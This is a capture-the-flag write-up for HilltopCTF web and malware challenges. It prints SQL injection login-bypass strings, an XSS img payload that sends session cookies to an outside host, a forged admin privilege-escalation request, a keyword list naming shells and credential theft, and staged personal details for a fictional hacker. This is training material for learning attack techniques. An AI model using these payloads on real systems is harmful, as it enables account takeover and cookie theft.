Loading...
SBT HILLTOP CTF

SBT - HILLTOPCTF

!!
IF YOU ARE A BEGGINNER PLEASE DON'T GO STRAIGHT TO THE ANSWER/FLAG. Try to understand how everything works... because after all what matters is the knowledge acquired

!!

Beep Beep Boop [Warmup]

Hey, Hey you! Yes you! I visited this weird website and suddendly started hearing some beep boop beep sounds... Can you help me figure out what it could be?
This web challenge has multiple references to robots.
When you hear the word robots in the web field, we all know we're talking about talking about Web Wanderers, Crawlers or Spiders. Read more about crawlers here!

These web crawlers are savages! We must control them and tell them where they can go and where they cannot go... This is why there is a common file called "robots.txt".
In this file specifically say what is allowed and what is not. (let's be real here... none of them actually respect it haha)

Having this information, lets now check if there is any robots.txtfile.
Whoa... what did we find here?
User-agent: * Disallow: /NmZmOWQ1MzkwNDdmZGUxNTllODhkMmQxZTExZWY1NzQuaHRtbA==

That looks like Base64... let's try decoding it! 6ff9d539047fde159e88d2d1e11ef574.html

Hummm... looks like a random html page... let's try accessing it.
Beep* Beep* Boop* Beep* Beep* HillTopCTF{Mr_r0b0t_w4s_h3r3_1ak20isjkd}

We got it!

Drop The Anchor [Warmup2]

There isnt much to say about this one... it's pretty much analysing code and giving it the right input.

Quick steps to solve it:

The JS code is analysing 13 chars from an anchor and matching against a specific character.

1st Step - Reverse Engineer the code so we get the right anchor
2nd Step - Add the anchor to the url (#weareanchored)
3rd Step - md5 the anchor and add it to the anchor (#weareanchored_c5c8a607a07dbd08ac8f58499ea1ed19)

tada! ;)


P2SEC 1 - Building

Looking closely at the buttons, some appear to be worned off...
It's a combination of 4 numbers and we know which ones they are... 1 4 6 8

If we inspect the html code, someone left a note on the wall mentioning that the code starts with the number 4.
So all we have to do now is "bruteforce" it.

The right code is 4 1 6 8

Tada!


P2SEC 2 - Login

This is a simple SQLi (SQL Injection) challenge.
The vulnerable field is Password and some of the following payloads would let the user bypass the login. (there are more)

' or '1'='1
- " or "1"="1
- "or"1"="1
- " OR "1"="1
- "OR"1"="1
tada! we are in!



P2SEC 3 - Tickets

This challenge might be a little bit boring, but its required to make sense to the story line.

Players are first presented with 4 tickets which are perfectly fine.
They must submit answers to all of them in order to progress.

The requirements to a valid answer is just a minimum of 50 characters.
(The content of the answer isn't being analysed, but could be done to make it harder)

Let's submit our comment with "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Once we've done that for the first 4 tickets, we will unlock 3 more.

Now... the 6th ticket, which is #6841711215 has a small payload to steal the session cookies.
All we have to do is open the source-code and copy the original and unrendered payload.

This is obviously an issue that must be reported... Lets head to the report page and fill the form with:
- 6841711215
- Suspicious Code
- < img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://dumpbin.com/binarygirl1010?c'+document.cookie;>
- Comments are not required.

Tada!


P2SEC 4 - Escalating

Given the information on the hints, let's crawl for some pages!

I've used DIRB.

Multiple files will come up, but only adminpanel.php is the right one.
If we try to access, it's going to give us a 400 bad Request.

If we change the request method to POST, we are going to start receiving a couple of PHP Errors.
With those errors we will be able to keep adding data to our payload until it's accepted.

Data Required:

- admin_name -> ross (found on the chall's brief)
- action -> set
- level -> 1
- target -> user's cookie

Your final payload should look something like
admin_name=ross
&action=set
&level=1
&target=def50200a45b1b0e3b944517ea531b7ef01ffc3422909f37b2777e6680269e374b9d52a2bf729f4e2c8e4e969b8d4
672e85723e67bc5884e7be7bc8cc2f5668af1c9094b2fe006f02a6817209ecc7a499bc1d742bf53ef48fa64bf1
e51df338362919f41fe805d88f9c37896f500d31c2093ae985ba42730e17296ceafe6dfd42d75a7959bf5bb32d20c4
754015db14d60ab640cec5fc5a62e45ae7ee149f703b2f529d030e2c28afdcceb5833d72c85f2fbaa435bc5ca9d4e
73f3a028b4eb676e996fcfcf7b94407becb735affd1df7bf4f8629dba4baa4b88493652323c5370636af1f
b797073abec37831734ea44feb979d7a2931d90fb1d37e003b3d4ddd2f75cf4b0efc16854494f868e635ba7546d5f42370949aff93fac5a7f3fbb638f892554d445181a7ceca28ab


Tada!



P2SEC 5 - PromoTest

There isn't much to this challenge... It's more educational than a challenge itself.

Analyse each report and mark them as positive.
This time, the users input is being validated.

If you get your answer wrong, you will be demoted.

Here are the keyword being verified for each ticket. (1 keyword found = pass)

#1 - disable|kill|stop|end|anti
#2 - steal|rob|hijack|credentials|username|password|login|money|cash|bank|credit|bitcoin
#3 - reverse|shell|php|remote|connection|code|execution

When all of them are correctly marked as positive, you will have access to 2 new pages. The flag is in Logs.

Tada!


P2SEC 6 - Authorities

The following data about the hacker must be submited to be able to retrieve the flag.

- Real Name -> Amy Sophia from https://www.instagram.com/depressedegurl666/ (found plain text in one of the gifs)
- Nickname -> binarygirl1010 (on the ticket payload)
- Real Address -> 62 Matilda St Port Lincoln SA 50606, Australia (me.jpg exif-data)
- Email Address -> h3ll22231144666999@protonmail.com (found on a note after defeating the malware)
- BTC/Paypal Address -> 1Z2Q89voyjwrVkbb6RfHAiLgqCaMs15w4 (in the malware's instructions)
- Known Ip Address -> 45.135.151.61 (from logs)

The IP linking to the hacker could be found on logs by searshing for the same date as the hacker submitted the malicious ticket

Tada!


P2SEC 6.1 - Tunnel

3 Part Flag.

The malware is considered defeated when the user pays the hacker.
Every 10 seconds an http request is made to a certain IP to check if the payment was done.

This can be achieved using, for example, Fiddler

All the player has to do is:
1st - Intercept the packet on the way back
2nd - Grab the encrypted information
3rd - Decrypt the hash, which is in md5, and follows the format: window's user + _0 (for example: john_0)
4th - Change the flag from 0 to 1
5th - Hash it again in md5
6th - Swap the hashes on the packet

You have now manipulated the malware into thinking that you have paid the hacker!

Part 1 -> base64( HilltopCTF{S1mpl3_m4lwar3_ ) - Hidden in the temp folder of windows (666.txt)
Part 2 -> base64( 4n4lysis_0011 ) - Windows Registery (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\666)
Part 3 -> base64( 0011ks0k2kso} ) - Follow Link on a note on desktop after defeating malware

It was just a simple but fun challenge :p



If you'd like a more detailed writeup on the challenges, feel free to dm me and I will be more than happy to supply you! ❤️